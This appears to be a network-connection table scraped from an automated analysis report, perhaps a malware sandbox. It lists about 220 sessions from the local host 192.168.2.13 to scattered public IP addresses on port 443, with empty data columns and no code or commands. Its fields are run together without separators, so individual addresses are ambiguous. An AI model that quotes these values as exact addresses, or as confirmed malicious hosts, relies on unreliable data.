                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19664192.168.2.1337416209.35.9.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19665192.168.2.1353842104.191.124.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19666192.168.2.1337544145.87.7.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19667192.168.2.1346400133.185.185.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19668192.168.2.135324414.72.32.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19669192.168.2.1351764180.240.126.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19670192.168.2.1359184136.94.239.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19671192.168.2.1341628149.22.178.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19672192.168.2.134680636.169.117.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19673192.168.2.1335196204.20.21.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19674192.168.2.134299863.43.45.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19675192.168.2.1334524195.54.155.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19676192.168.2.1359786172.169.3.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19677192.168.2.1358366134.253.50.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19678192.168.2.1347346149.195.229.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19679192.168.2.1344450105.151.146.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19680192.168.2.1355084163.250.10.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19681192.168.2.1355770153.143.43.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19682192.168.2.1343178146.148.140.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19683192.168.2.133283034.45.107.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19684192.168.2.134514636.20.76.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19685192.168.2.135898870.240.214.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19686192.168.2.134177678.32.137.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19687192.168.2.1349214194.160.52.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19688192.168.2.1355582136.8.152.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19689192.168.2.1338338161.248.30.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19690192.168.2.135600427.121.112.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19691192.168.2.1350524153.167.228.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19692192.168.2.1342252117.113.118.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19693192.168.2.1354292171.82.208.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19694192.168.2.1352732136.253.80.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19695192.168.2.135262218.97.22.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19696192.168.2.135076825.173.218.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19697192.168.2.1346054179.146.151.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19698192.168.2.135361625.133.227.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19699192.168.2.1337330209.160.162.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19700192.168.2.1360524190.96.87.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19701192.168.2.1335308190.225.142.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19702192.168.2.133622038.192.10.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19703192.168.2.1347758135.90.101.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19704192.168.2.133551082.234.13.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19705192.168.2.1348688193.130.229.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19706192.168.2.133817088.82.124.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19707192.168.2.1346158176.215.211.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19708192.168.2.134299662.236.30.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19709192.168.2.1339954212.145.244.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19710192.168.2.1337966102.73.171.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19711192.168.2.134831685.144.36.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19712192.168.2.133640861.211.67.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19713192.168.2.135569237.47.90.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19714192.168.2.1344440143.190.159.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19715192.168.2.134959894.3.130.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19716192.168.2.1345938168.68.163.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19717192.168.2.13517728.129.243.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19718192.168.2.134625025.152.51.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19719192.168.2.1356274189.87.226.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19720192.168.2.1343424120.150.156.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19721192.168.2.135635054.67.38.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19722192.168.2.135911212.136.180.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19723192.168.2.1354906152.67.139.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19724192.168.2.1339980176.58.219.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19725192.168.2.1359706141.118.97.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19726192.168.2.133670651.215.69.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19727192.168.2.1354414160.201.98.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19728192.168.2.1334094118.80.196.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19729192.168.2.1351348126.49.147.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19730192.168.2.135381432.253.235.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19731192.168.2.135130058.64.65.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19732192.168.2.1346852216.50.51.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19733192.168.2.1345726146.12.43.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19734192.168.2.1360294123.183.2.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19735192.168.2.135305880.202.114.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19736192.168.2.1349968131.31.114.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19737192.168.2.133702869.52.138.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19738192.168.2.1350056112.31.207.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19739192.168.2.133464417.138.159.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19740192.168.2.1357448102.1.132.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19741192.168.2.1340610100.30.239.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19742192.168.2.134532652.254.188.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19743192.168.2.1342274108.165.68.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19744192.168.2.135497072.115.236.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19745192.168.2.134465459.193.249.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19746192.168.2.133941619.159.163.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19747192.168.2.134859494.240.93.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19748192.168.2.135791014.31.141.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19749192.168.2.1339036109.191.252.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19750192.168.2.1360748151.148.246.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19751192.168.2.1342408210.155.67.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19752192.168.2.133499887.61.108.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19753192.168.2.1347440182.231.239.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19754192.168.2.135640070.153.109.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19755192.168.2.1350094189.74.169.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19756192.168.2.1360038103.30.77.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19757192.168.2.1357162217.92.78.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19758192.168.2.133720652.118.162.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19759192.168.2.1346646170.158.237.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19760192.168.2.1334202136.187.232.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19761192.168.2.133411052.55.214.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19762192.168.2.1345856144.14.103.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19763192.168.2.134582853.113.81.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19764192.168.2.134761241.74.245.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19765192.168.2.1359884207.147.188.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19766192.168.2.134892891.197.83.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19767192.168.2.134344264.222.20.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19768192.168.2.1342498171.233.153.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19769192.168.2.134443214.55.253.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19770192.168.2.1348934119.249.233.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19771192.168.2.1351266188.81.225.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19772192.168.2.135944261.200.119.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19773192.168.2.1359496156.68.198.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19774192.168.2.1355276218.62.20.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19775192.168.2.134426288.172.127.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19776192.168.2.133675096.212.9.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19777192.168.2.1342888123.209.255.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19778192.168.2.1339562202.30.135.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19779192.168.2.135023662.206.44.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19780192.168.2.1354762189.248.56.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19781192.168.2.1339730180.183.23.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19782192.168.2.1349862123.86.204.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19783192.168.2.134451642.160.252.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19784192.168.2.1358772137.28.73.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19785192.168.2.1335886168.212.192.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19786192.168.2.1353988198.170.60.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19787192.168.2.133618859.148.97.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19788192.168.2.133983495.232.33.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19789192.168.2.135426898.128.238.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19790192.168.2.1340992145.83.8.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19791192.168.2.134785064.80.57.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19792192.168.2.1349418116.12.194.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19793192.168.2.1347166133.51.189.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19794192.168.2.1349636123.93.49.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19795192.168.2.1358980206.169.89.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19796192.168.2.1355720191.107.110.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19797192.168.2.135433475.244.53.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19798192.168.2.135043659.226.93.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19799192.168.2.1333526190.158.183.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19800192.168.2.134856874.244.193.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19801192.168.2.1338244123.116.25.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19802192.168.2.1338558129.8.49.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19803192.168.2.13347829.185.194.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19804192.168.2.1355152142.149.104.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19805192.168.2.1333792189.85.111.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19806192.168.2.1342140165.161.52.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19807192.168.2.13526448.40.156.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19808192.168.2.134859068.188.201.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19809192.168.2.1333418207.79.64.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19810192.168.2.133396060.87.49.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19811192.168.2.134102025.255.214.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19812192.168.2.134931071.104.242.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19813192.168.2.1347902135.218.85.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19814192.168.2.134566275.201.117.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19815192.168.2.1349768184.207.236.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19816192.168.2.1339432192.173.213.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19817192.168.2.134491257.159.215.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19818192.168.2.135019473.55.73.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19819192.168.2.1352598185.8.147.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19820192.168.2.1337762218.72.182.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19821192.168.2.1348968166.103.100.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19822192.168.2.134553294.233.174.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19823192.168.2.1352894193.60.77.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19824192.168.2.1353524178.89.9.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19825192.168.2.1343110217.51.253.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19826192.168.2.134549475.190.159.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19827192.168.2.1338818189.89.37.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19828192.168.2.133810464.75.241.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19829192.168.2.1339218152.164.164.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19830192.168.2.133297061.228.115.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19831192.168.2.1351466145.238.103.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19832192.168.2.1336164134.79.230.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19833192.168.2.1347608109.102.240.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19834192.168.2.135550243.198.169.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19835192.168.2.133721483.89.230.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19836192.168.2.1353346205.237.161.107443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19837192.168.2.1354656172.52.225.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19838192.168.2.134271495.98.72.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19839192.168.2.1334604161.208.90.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19840192.168.2.134401840.197.152.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19841192.168.2.1333304120.26.252.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19842192.168.2.1347120204.58.178.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19843192.168.2.1352314123.77.133.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19844192.168.2.135754696.235.190.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19845192.168.2.1334432193.109.231.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19846192.168.2.1346388113.2.8.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19847192.168.2.134061485.93.110.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19848192.168.2.1339794197.222.166.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19849192.168.2.1356456106.101.88.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19850192.168.2.134194484.217.188.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19851192.168.2.134107031.0.151.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19852192.168.2.1344726167.14.189.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19853192.168.2.1339354179.253.115.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19854192.168.2.134237894.106.226.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19855192.168.2.134014023.210.27.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19856192.168.2.136021893.130.145.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19857192.168.2.1347066154.33.191.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19858192.168.2.1355480188.80.137.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19859192.168.2.1335190160.95.46.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19860192.168.2.135748437.171.236.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19861192.168.2.1347764200.164.198.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19862192.168.2.1339444122.139.90.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19863192.168.2.1345604161.247.213.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19864192.168.2.1353638116.93.125.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19865192.168.2.1337558155.96.45.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19866192.168.2.1351662157.38.7.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19867192.168.2.1337728204.104.230.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19868192.168.2.1339414202.172.115.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19869192.168.2.1334470172.7.245.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19870192.168.2.1348412192.212.105.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19871192.168.2.134307274.130.111.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19872192.168.2.134150281.167.176.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19873192.168.2.1355634118.24.245.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19874192.168.2.1344944182.244.49.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19875192.168.2.134385653.161.209.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19876192.168.2.1349090171.19.226.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19877192.168.2.134363488.203.98.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19878192.168.2.133756251.113.198.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19879192.168.2.1335250189.186.165.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19880192.168.2.135877277.139.86.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19881192.168.2.1338036202.105.11.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19882192.168.2.134799019.160.142.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19883192.168.2.13593181.125.84.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19884192.168.2.135481674.194.71.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    19885192.168.2.133501035.50.175.27443
